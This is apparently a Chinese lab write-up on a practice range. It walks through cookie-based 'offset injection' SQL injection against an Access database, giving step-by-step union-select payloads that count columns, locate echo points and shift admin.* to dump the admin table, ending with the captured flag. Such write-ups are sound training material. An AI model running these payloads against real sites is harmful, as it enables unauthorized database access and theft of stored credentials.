本文介绍了在Access数据库中利用偏移注入(移位溢注)来获取表中数据的方法。通过靶场实战,展示了如何通过调整查询语句,确定表名、字段数以及回显点,最终成功获取目标字段的数据。
靶场地址:http://kypt8004.ia.aqlab.cn/
本次靶场使用的仍是access数据库,Access数据库是一种比较古老的数据库,没有那么的只能,我们想要表名和字段名,只能去猜或者爆破,在无法猜出字段名的情况下怎么获取表中数据呢?这就需要用到偏移注入(移位溢注)。
在我们确认了表名之后,可以用 **表名.来表示表中全部字段,假设一个表中有5个字段,回显点为2,3字段位置,而我们要查询的表(admin)中有3个字段,那我们可以这样写
**… union select 1,admin.,5 from admin 这样就会显示admin表中的前2个字段,如果想查看第三个字段,只需要将admin.*向前移动,就可以显示2,3字段
靶场:
本次靶场和cookie靶场大致相同,同样需要cookie注入
我们还是进入新闻中心,前面确认过新闻中心的这个表中有10个字段,我们尝试使用admin.的方式先确定admin表中的字段数
在cookie中添加 id 171 and 1=1 union select 1,2,3,4,5,6,7,8,9,admin. from admin
发现页面报错,说明字段数没有一致,id 171 and 1=1 union select 1,2,3,4,5,6,7,8,admin.* from admin
减少字段,直到 id 171 and 1=1 union select admin.* from admin 为止,发现页面还是报错,猜测可能admin表中字段数超过了当前表中字段数,需要寻找新的注入点进行尝试
在其他页面尝试之后,发现产品中心也存在cookie注入
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wvV7CGSj-1637829659630)(https://nc0.cdn.zkaq.cn/md/10375/20211125/f61d1276-27d7-4773-9548-8d8d803f982a.png)]
105 and 1=1 order by 26 通过此条语句我发现这个表中的字段数为26[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LXlswgWJ-1637829659634)(https://nc0.cdn.zkaq.cn/md/10375/20211125/88f738d9-65bd-42e3-9e2e-4bbcf0ddea24.png)]
105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin
发现页面上回显点为3,5,7 这几个回显点都比较靠前,猜测可能还有回显点可能是比较靠中后位置的,于是将查询语句修改为有特征的语句
105 and 1=2 union select 1333,2333,3333,4333,5333,6333,7333,8333,9333,10333,11333,12333,13333,14333,15333,16333,17333,18333,19333,20333,21333,22333,23333,24333,25333,26333 from admin
去页面源码中查找带有333的数字
果然存在比较靠后的回显点,25字段位置,在测试admin表中的字段数
105 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,admin.* from admin
发现admin中含有16个字段
我们要查的是最后一个字段中的数据,回显点是在25字段,所以需要将admin.前移一字段位置
105 and 1=2 union select 1,2,3,4,5,6,7,8,9,admin.,10 from admin
成功获取其中数据:zkaq{f0e12dafb6}
500
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
